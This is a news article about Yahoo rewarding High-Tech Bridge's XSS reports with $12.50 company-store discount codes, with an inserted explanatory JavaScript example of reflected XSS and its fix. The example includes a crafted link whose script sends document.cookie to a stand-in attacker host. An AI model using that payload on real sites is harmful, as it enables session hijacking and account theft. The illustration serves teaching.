Yahoo slammed over $12.50 security flaw rewards
Security researchers claim paltry bounty will not encourage others to share their findings.
Yahoo has been criticised for allegedly rewarding security researchers who uncover flaws in its products with discounts on branded goods sold through its company store.
IT security services provider High-Tech Bridge claims to have been offered a $12.50 discount code for each security flaw it uncovered, which was only redeemable in the Yahoo Company Store.
The organisation said it was offered the reward by Yahoo after discovering several cross-site scripting (XSS) vulnerabilities.
Each one would reportedly have allowed an attacker to compromise any @yahoo.com account by getting its owner to click on a specially crafted link while logged into the site, since script injected that way runs with the victim's session.
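The reflected XSS pattern described above, as an added example that is not Yahoo's code and not part of the original article: a page that copies a URL parameter into its HTML unescaped, the same page with output encoding applied, and a constructed attacker link of the kind a victim would be tricked into clicking. The page path, the `q` parameter, the hostnames and all function names are assumptions made for the illustration.

```javascript
// Added example (not Yahoo's code): reflected XSS via a crafted link.
// Page name, parameter name, hostnames and helper names are assumed.

// Vulnerable: the "q" parameter is copied into the HTML verbatim, so
// markup supplied in the URL becomes markup in the response.
function renderSearchVulnerable(q) {
  return `<h1>Results for ${q}</h1>`;
}

// Hardened: HTML-escape URL-derived text before placing it in element
// content. (Attribute, URL and script contexts each need their own encoder;
// this escaper covers element content only.)
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

function renderSearchHardened(q) {
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// Read a query parameter from a link the way the server would see it after
// URL decoding. URL is a standard global in browsers and Node.
function queryParam(link, name) {
  return new URL(link).searchParams.get(name);
}

// Constructed attacker link (hostnames are made up). Opened by a logged-in
// victim, the vulnerable page would execute the injected script in the
// site's origin, where it can read document.cookie or call the site's own
// APIs with the victim's session. The exfiltration target is illustrative.
const CRAFTED_LINK =
  'https://mail.example.test/search?q=' +
  encodeURIComponent(
    '<script>fetch("https://attacker.test/?c=" + document.cookie)</script>'
  );

// Crude exploitability check: does the rendered response contain a script
// element that originated in the request?
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Render both variants for the crafted link.
const q = queryParam(CRAFTED_LINK, 'q');
const vulnerableHtml = renderSearchVulnerable(q); // contains a live <script>
const hardenedHtml = renderSearchHardened(q);     // script text is inert
```

The check is deliberately simple; real reflected XSS is also reachable through event-handler attributes, `javascript:` URLs and unquoted attribute values, which is why output encoding must match the context the data lands in rather than being a single global escape.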
The company's research team said it notified Yahoo of the flaws on Monday 23 September, but claims only two of them were acknowledged within 48 hours of the report being made.
"Yahoo warmly thanked us for reporting the vulnerabilities and offered us...12.50 USD reward per one vulnerability," the company said in a statement.
"Moreover, this sum was given as a discount code that can only be used in the Yahoo Company Store, which sells Yahoo's corporate T-shirts, cups, pens and accessories."
All of the vulnerabilities exposed by High-Tech Bridge, including a further one it reported that Yahoo said it already knew about, have now been patched.
Ilia Kolochenko, High-Tech Bridge CEO, has called on Yahoo to rethink its rewards scheme, because it offers little incentive to report bugs.
"Paying several dollars per vulnerability is a bad job and won't motivate people to report security vulnerabilities to them, especially when such vulnerabilities can be easily sold on the black market for a much higher price," he said.
"If Yahoo cannot afford to spend money on its corporate security, it should at least try to attract security researchers by other means. Otherwise none of Yahoo's customers are safe."
IT Pro approached Yahoo for comment on this story, but was still awaiting a response at the time of publication.
This is the second time in less than a week that Yahoo's attitude to security has come under scrutiny.
The company's decision to reuse inactive email addresses has led to complaints by some users that they've received personal emails intended for the previous owner.